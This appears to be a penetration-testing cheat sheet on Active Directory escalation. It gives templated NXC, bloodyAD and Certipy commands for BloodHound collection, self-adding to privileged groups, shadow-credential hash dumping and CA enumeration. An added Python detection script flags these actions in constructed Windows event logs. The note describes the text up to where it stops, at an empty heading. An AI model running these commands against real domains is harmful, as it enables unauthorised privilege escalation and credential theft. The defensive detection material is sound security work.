Escalation

NXC

Gathering data for BloodHound to find escalation paths

nxc ldap [ds-host] -u [username] -p '[password]' --bloodhound --dns-server [dns ip] --collection all

BloodyAD

If we're a member of a group that has GenericAll or GenericWrite privileges over another group, we can add ourselves to that group if it improves our reach.

bloodyAD --host [dc-host] -d [domain] -u [username] -p '[password]' add groupMember "[Group Name]" [username]

Certipy

We can dump the hashes of a user that we have GenericWrite over.

  • BE SURE TO SYNC YOUR CLOCK WITH THE DOMAIN BEFORE RUNNING THESE (Kerberos authentication fails on clock skew)

ntpdate [domain]
certipy-ad shadow auto -username [username]@[domain] -password '[password]' -account [target account]
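
From the defender's side, the group self-add (BloodyAD section) and the Certipy shadow command (which works by writing the target's msDS-KeyCredentialLink attribute) both leave Security log events on the domain controller. The triage below is an added example, not code from the original page or from the NXC, bloodyAD or Certipy projects. The event records are constructed, and it assumes directory-service change auditing (event 5136) is enabled with a SACL covering the attribute.

```python
# Added detection example; the event records below are constructed, not real logs.
GROUP_ADD_IDS = {4728, 4732, 4756}  # member added to global / local / universal security group
DS_MODIFY_ID = 5136                 # directory service object modified (needs a SACL on the object)
VALUE_ADDED = "%%14674"             # OperationType value for "Value Added"

SAMPLE_EVENTS = [  # constructed sample; field names follow the Windows Security event schema
    {"EventID": 4728, "SubjectUserSid": "S-1-5-21-1-2-3-1105", "SubjectUserName": "jdoe",
     "MemberSid": "S-1-5-21-1-2-3-1105", "TargetUserName": "Server Operators"},
    {"EventID": 4728, "SubjectUserSid": "S-1-5-21-1-2-3-500", "SubjectUserName": "Administrator",
     "MemberSid": "S-1-5-21-1-2-3-1107", "TargetUserName": "Helpdesk"},
    {"EventID": 5136, "SubjectUserName": "jdoe", "OperationType": "%%14674",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "ObjectDN": "CN=svc_backup,CN=Users,DC=corp,DC=example"},
    {"EventID": 5136, "SubjectUserName": "WS01$", "OperationType": "%%14674",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "ObjectDN": "CN=WS01,CN=Computers,DC=corp,DC=example"},
    {"EventID": 5136, "SubjectUserName": "jdoe", "OperationType": "%%14674",
     "AttributeLDAPDisplayName": "description",
     "ObjectDN": "CN=svc_backup,CN=Users,DC=corp,DC=example"},
]

def object_cn(dn):
    """Return the first RDN value of a DN: 'CN=WS01,CN=Computers,...' -> 'WS01'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first

def triage(events):
    """Return (rule, actor, target) tuples for events that deserve a closer look."""
    hits = []
    for ev in events:
        eid = ev.get("EventID")
        subject_sid = ev.get("SubjectUserSid")
        if eid in GROUP_ADD_IDS and subject_sid and subject_sid == ev.get("MemberSid"):
            # An account adding itself to a group is rare in normal administration.
            hits.append(("self-added-to-group", ev["SubjectUserName"], ev["TargetUserName"]))
        elif (eid == DS_MODIFY_ID and ev.get("OperationType") == VALUE_ADDED
              and ev.get("AttributeLDAPDisplayName", "").lower() == "msds-keycredentiallink"):
            actor = ev.get("SubjectUserName", "")
            target = object_cn(ev.get("ObjectDN", ""))
            # Heuristic (assumption): an account writing its own key credential is the
            # common benign case; a different actor is the pattern worth reviewing.
            if actor.rstrip("$").lower() != target.lower():
                hits.append(("key-credential-written-by-other", actor, target))
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```
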

Getting Common Name of CA

NXC

nxc ldap [dc-host] -u [username] -H [user hash] -M adcs 

Certutil

If you're logged in as a user (e.g. over Evil-WinRM), you can use Certutil to get this information.

BloodHound

You can also see this in BloodHound.

Find Vulnerable Templates
